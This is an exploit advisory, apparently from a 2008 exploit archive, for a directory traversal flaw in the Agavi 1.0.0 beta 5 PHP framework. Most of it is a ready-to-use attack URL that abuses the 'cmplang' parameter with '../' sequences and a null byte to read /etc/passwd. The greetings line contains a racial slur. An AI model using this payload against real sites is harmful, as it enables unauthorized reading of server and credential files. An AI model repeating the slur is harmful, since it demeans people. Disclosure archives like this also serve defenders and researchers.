Agavi 1.0.0 beta 5 (cmplang) Remote File Disclosure Vulnerability

2008-11-03 22:01:05

AGAVI <=Agavi 1.0.0 beta 5 Directory Transversal Exploit
vendor : http://www.agavi.org/
affected versions : <=Agavi 1.0.0 beta 5 (latest)
found by t0fx // http://forum.europasecurity.org white hat crew //

exploit :

http://www.site.com/index.php?module=page&action=Display&pageref=[pageref of the site]&cmplang=../../../../../../../../etc/passwd%00.jpg


Greetz to zataz.com // security-sh3ll.com // str0ke // Pig nigger ^^

#

Fixes

No fixes

In order to submit a new fix you need to be registered.